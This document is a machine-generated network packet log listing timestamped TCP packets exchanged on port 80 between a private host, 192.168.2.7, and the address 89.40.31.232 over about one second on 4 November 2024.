                                                              Nov 4, 2024 09:27:59.125233889 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125238895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125253916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125266075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125267029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125279903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125287056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125293970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125308037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125317097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125329971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125334024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125348091 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125360966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125363111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125375986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125385046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125391960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125405073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125412941 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125427961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125458002 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125473976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125488043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125499964 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125511885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125513077 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125524044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125528097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125538111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125540972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125552893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125562906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125595093 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125607967 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125610113 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125623941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125636101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125648022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125658989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125662088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125689030 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125715017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125750065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125761986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125773907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125787973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125799894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125812054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125823975 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125825882 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125844002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125855923 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125864029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125868082 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125878096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125885010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125905037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125930071 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125931025 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125943899 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125957966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125972033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125983953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126018047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126082897 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126096010 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126108885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126121044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126125097 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126135111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126147032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126151085 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126177073 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126189947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126233101 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126246929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126259089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126272917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126285076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126288891 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126296997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126313925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126317978 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126332045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126338005 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126352072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126353025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126367092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126379013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126382113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126394033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126408100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126408100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126434088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126447916 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126481056 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126493931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126507044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126519918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126533031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126535892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126545906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126565933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126574993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126589060 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126599073 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126600027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126600027 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126621962 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126645088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126655102 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126667976 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126671076 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126682997 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126692057 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126708984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126718044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126728058 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126730919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126744032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126750946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126770973 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126790047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126790047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126802921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126816034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126827955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126828909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126852036 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126858950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126871109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126876116 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126876116 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126907110 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.126945972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126960039 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126971960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126982927 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.126991987 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.127022028 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.127947092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.127986908 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128004074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128038883 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128051996 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128073931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128087044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128098965 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128134012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128145933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128175974 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128189087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128202915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128216982 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128226995 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128241062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128254890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128256083 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128268003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128281116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128292084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128309965 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128317118 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128329992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128334045 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128344059 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128355980 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128366947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128393888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128408909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128423929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128436089 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128448009 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128454924 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128463030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128495932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128494978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128509045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128520012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128523111 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128542900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128575087 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128592968 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128607035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128619909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128674984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128683090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128694057 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128707886 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128720999 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128735065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128747940 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128752947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128797054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128818035 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128822088 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128835917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128846884 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128868103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128868103 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128884077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128895998 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128897905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128911972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128935099 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128946066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128948927 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.128959894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128972054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.128989935 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.129014969 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130316973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130330086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130342960 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130357027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130364895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130388975 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130413055 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130434990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130448103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130460024 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130472898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130481958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130489111 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130491972 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130507946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130522013 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130547047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130832911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130846977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130857944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130898952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130898952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130899906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130916119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130928993 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130945921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130959988 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.130969048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130979061 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.130989075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131000042 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131052971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131228924 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131242990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131256104 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131269932 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131284952 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131285906 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131316900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131350040 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131370068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131383896 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131396055 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131408930 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131427050 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131453037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131486893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131500006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131513119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131525040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131534100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131539106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131542921 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131555080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131567001 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131571054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131583929 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131603956 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131632090 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131645918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131656885 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.131680012 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.131715059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.159199953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159214020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159225941 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159266949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159281015 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159291983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.159327984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.159379959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.224912882 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224936008 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224946022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224962950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224976063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224986076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.224999905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225013971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225028992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225131035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225142002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225152969 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225155115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225156069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225156069 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225172043 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225187063 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225199938 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225281954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225290060 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225290060 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225290060 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225296021 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225311041 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225325108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225332022 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225333929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225390911 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225405931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225419044 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225431919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225444078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225455046 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225456953 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225477934 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225483894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225500107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225502968 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225513935 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225527048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225528955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225542068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225562096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225589991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225795031 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225809097 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225820065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225832939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225845098 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225851059 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225857973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225869894 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225872040 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225883961 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225884914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225897074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225908995 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225917101 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225922108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225936890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225950003 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:28:00.225951910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225960016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.225996017 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:28:00.226129055 CET804993289.40.31.232192.168.2.7
